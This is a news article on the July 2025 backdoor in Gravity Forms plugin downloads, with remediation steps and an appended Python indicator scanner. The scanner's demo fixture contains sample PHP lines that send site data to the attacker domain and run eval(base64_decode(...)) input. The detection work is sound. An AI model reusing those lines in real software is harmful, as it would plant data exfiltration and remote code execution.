WordPress Under Fire: Gravity Forms Plugin Hit by Backdoor Attack
A major supply-chain attack has rocked the WordPress ecosystem. Gravity Forms, a widely used premium plugin for building forms, was compromised with a backdoor, potentially impacting over one million websites, including those run by major brands like Airbnb, ESPN, Google, and UNICEF.
Backdoored Plugin Distributed via Manual Downloads
Security researchers at PatchStack discovered that malicious code was injected into Gravity Forms packages downloaded directly from the official website between July 10 and 11, 2025. Only manual downloads and Composer-based installs were affected; the compromise bypassed Gravity Forms’ official update mechanism, which remains unaffected.
The infected plugin contained a malicious PHP file (common.php) that sent data to a suspicious domain, gravityapi[.]org/sites. The script harvested critical site information, such as the site URL, admin path, active plugins, themes, and server software versions, and exfiltrated it to the attackers.
Remote Code Execution Without Authentication
More alarming is the discovery that the malware enabled unauthenticated remote code execution. Hidden in bookmark-canonical.php, the base64-encoded payload masqueraded as part of WordPress’ core content management system.
The attackers implemented functions like handle_posts(), handle_media(), and handle_widgets() that, when triggered, executed attacker-supplied code through unsafe eval() calls. None of this required an admin login, making the exploit extremely dangerous.
Attackers Gained Full Admin Access
According to RocketGenius, the plugin’s developer, the injected malware blocked update attempts, reached out to additional servers for payloads, and created an unauthorized admin account, effectively handing full control of the site to the attackers.
The affected versions were Gravity Forms 2.9.11.1 and 2.9.12, available for manual download during the short compromise window. The automatic update service and add-on installer provided via Gravity Forms’ built-in mechanisms were not affected, the company confirmed.
What Site Admins Should Do Now
Admins who downloaded Gravity Forms on or after July 10 are advised to:
- Reinstall a clean version of the plugin from trusted sources.
- Check for suspicious admin accounts or modified core files.
- Use RocketGenius’ guide to detect infections via direct URL checks.
- Monitor for any signs of unexpected activity or backdoor callbacks.
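As an added example (not from the article, PatchStack or RocketGenius), the checklist above can be partly automated with a read-only scan of the plugin directory for the indicators the article names: the gravityapi[.]org callback domain, the dropped bookmark-canonical.php file, the handle_posts()/handle_media()/handle_widgets() handler names, eval()-of-base64 patterns, and the two affected version strings. The scan logic, regexes and the constructed sample tree in demo() are my own; a real check would point scan_plugin_dir() at wp-content/plugins/gravityforms.

```python
import os
import re
import tempfile

# Indicators from the article (domain, dropped file, handler names, versions); scan logic is mine.
CALLBACK_DOMAIN = "gravityapi.org"
DROPPED_FILE = "bookmark-canonical.php"
HANDLER_NAMES = ("handle_posts", "handle_media", "handle_widgets")
AFFECTED_VERSIONS = ("2.9.11.1", "2.9.12")
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.M)

def scan_plugin_dir(plugin_dir):
    """Return sorted (relative_path, reason) findings for one plugin directory (read-only)."""
    findings = []
    for root, _dirs, files in os.walk(plugin_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, plugin_dir).replace(os.sep, "/")
            if name == DROPPED_FILE:
                findings.append((rel, "dropped file from the compromised build"))
            if not name.endswith(".php"):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if CALLBACK_DOMAIN in src:
                findings.append((rel, "references attacker callback domain"))
            if EVAL_B64.search(src):
                findings.append((rel, "eval(base64_decode(...)) pattern"))
            if any(h + "(" in src for h in HANDLER_NAMES):
                findings.append((rel, "backdoor handler function name"))
            m = VERSION_RE.search(src) if name == "gravityforms.php" else None
            if m and m.group(1) in AFFECTED_VERSIONS:
                findings.append((rel, "affected version " + m.group(1)))
    return sorted(findings)

def demo():
    """Build a constructed (fake) plugin tree carrying the indicators, then scan it."""
    files = {  # constructed sample content, not the real plugin or the real malware
        "gravityforms.php": "<?php\n/*\n * Plugin Name: Gravity Forms\n * Version: 2.9.12\n */\n",
        "common.php": "<?php\nwp_remote_post('https://gravityapi.org/sites', $data);\n",
        "includes/bookmark-canonical.php": "<?php\nfunction handle_posts($d) { eval(base64_decode($d)); }\n",
        "includes/clean.php": "<?php\necho 'nothing to see';\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in files.items():
            os.makedirs(os.path.dirname(os.path.join(tmp, rel)), exist_ok=True)
            with open(os.path.join(tmp, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_plugin_dir(tmp)
```

Any hit should be treated as a signal to follow the reinstall-and-review steps above, not as proof of a clean or infected site on its own.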
PatchStack has also reported that the attacker domains were registered on July 8, indicating a coordinated and premeditated supply-chain breach.
Conclusion: A Wake-Up Call for WordPress Site Owners
This incident highlights the growing risks of supply-chain attacks in the WordPress plugin ecosystem. While RocketGenius acted quickly to mitigate the damage, the backdoor’s stealth and access level serve as a reminder that manual installations carry real security risks. As cyber threats evolve, so too must the vigilance of developers and site administrators alike.